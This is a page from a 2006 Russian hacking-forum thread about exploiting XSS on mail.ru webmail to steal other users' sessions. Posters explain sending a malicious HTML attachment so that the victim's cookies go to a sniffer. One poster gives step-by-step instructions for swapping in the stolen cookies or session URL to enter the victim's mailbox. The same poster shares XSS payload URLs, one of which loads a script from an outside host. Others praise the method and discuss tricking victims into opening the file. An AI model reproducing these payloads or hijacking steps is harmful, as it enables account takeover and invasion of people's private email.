ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу XSS на mail.ru
   
Ответ
Страница 2 из 4 < 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 07.10.2006, 15:38
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию
видео отправил но ещё не опубликовали ,может и-за не очень хорошего качества
 
Ответить с цитированием

  #12  
Старый 07.10.2006, 15:57
SladerNon
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807

Репутация: 901


По умолчанию
Actu@l SpY

Попробуй ищё раз отправить. Видео не дошло.
 
Ответить с цитированием

  #13  
Старый 07.10.2006, 20:59
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315

Репутация: 1228


Отправить сообщение для nc.STRIEM с помощью ICQ
По умолчанию
ЭТУ XSS не прикрыли!
прост чеб она выполнилась недостаточно открыть письмо!
Отсылаеться она так: сохраняеться в html файл, после чего файл прикрепляеться к письму! потом при прочтение письма жертва должна нажать "скачать" прикрепленный файл, и в появившемся окошке нажать кнопку открыть! собсно вот так))) тогда срабатывает, и куки уплывают.......
 
Ответить с цитированием

  #14  
Старый 08.10.2006, 15:45
Lany
Новичок
Регистрация: 13.09.2006
Сообщений: 15
Провел на форуме:
173901

Репутация: 7
Отправить сообщение для Lany с помощью ICQ
По умолчанию
Классно, а от браузера жертвы результат не зависит?
 
Ответить с цитированием

  #15  
Старый 08.10.2006, 17:42
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию
на мaйл.ру вопше по себе ху* знает какие у них там глиуки на сервере ,вчера вечером сниффер перестал выдёргивать сессию ,сегодня сессия и куки выдёргиваетса нормально.

когда на сниффер приходит куки и путь к ящику: http://win.mail.ru/cgi-bin/
то надо менять cookie в опере
в каждый параметр вставляете своё значение например так:
заходите к себе на емаил через оперу дальше в инструменты,настройки,куки ,управление cookies ,виде-те @майл.ру кликнете на логотип открывается табло с куками:
c8: 71gpRQAAAAD1LAEAAAAAARAQAAAAABGR0BAAAAAAD7iAEAA
Mpop:1160300756:4d50560750005024f6a5d5e465e0404090 c1d010c00184958520c44115c565c5b1b4341:xak4u@mail.r u:
Mpopl:63920967
mrcu:FDD24528E35C2CFCD118A66742
p:g20EAEr/eAA
t:bLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAABAAABAAAAAAAABgMpgcA
теперь меняете каждый параметр на то,что утянул сниффер
вход:http://win.mail.ru/cgi-bin/start

утенулась сессия то куки подменивать в Опере не нужно,на тот момент пока жертва в онлайне читает письмо вы входите так : http://win.mail.ru/session/5a0f5b647243746f19050219091d011b0007014f6a5d5e465e 0704091b02747b1f5c504350555842105b5c44411f4642/start
остальное вот это:/readmsg/document.html?id=11603102580000017668;0;1&mode=att achment&channel=&notype удаляете

если не разберётесь стучите ,всем удачи
Последний раз редактировалось Actu@l SpY; 08.10.2006 в 18:24..
 
Ответить с цитированием

  #16  
Старый 08.10.2006, 22:25
Nowi4ok
Banned
Регистрация: 13.12.2005
Сообщений: 28
Провел на форуме:
186245

Репутация: -12
По умолчанию
rabotaet respekt
 
Ответить с цитированием

  #17  
Старый 09.10.2006, 03:01
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию
выше приведённый мной вариант срабатывает и на Рамблер.ру
ещё нашёл вариант : http://win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body="><SCRIPT SRC=http://devarsiv.org/alex/j.js></SCRIPT>
но ругается на потенциальный опасный код в письме ,тoесть в прикреплённом хтмл файле
вот сам ксс на майле.ру :win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body=<script>alert('XSS')</script>
Последний раз редактировалось Actu@l SpY; 09.10.2006 в 04:34..
 
Ответить с цитированием

  #18  
Старый 09.10.2006, 18:32
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315

Репутация: 1228


Отправить сообщение для nc.STRIEM с помощью ICQ
По умолчанию
Цитата:
Сообщение от Actu@l SpY  
выше приведённый мной вариант срабатывает и на Рамблер.ру
ещё нашёл вариант : http://win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body="><SCRIPT SRC=http://devarsiv.org/alex/j.js></SCRIPT>
но ругается на потенциальный опасный код в письме ,тoесть в прикреплённом хтмл файле
вот сам ксс на майле.ру :win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body=<script>alert('XSS')</script>
У мя не пашет! не уверен че она работает или работала в ближайшее время)))
 
Ответить с цитированием

  #19  
Старый 10.10.2006, 00:23
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию
вчера алерт выскакивал 100% отвечаю, сегодня голяк
в паб-лик больше скидывайте баги ..короче
 
Ответить с цитированием

  #20  
Старый 11.10.2006, 21:48
Lany
Новичок
Регистрация: 13.09.2006
Сообщений: 15
Провел на форуме:
173901

Репутация: 7
Отправить сообщение для Lany с помощью ICQ
По умолчанию
круто !!!!!!!! Только нужно умудрится заставить жертву скачать файл
 
Ответить с цитированием
Ответ
Страница 2 из 4 < 1 2 3 4 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IE XSS Kit .Slip Чаты 22 23.10.2006 06:45
XSS worms Xex Статьи 0 02.10.2006 01:49
Xss на mail.ru em00s7 E-Mail 14 08.06.2006 00:38
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ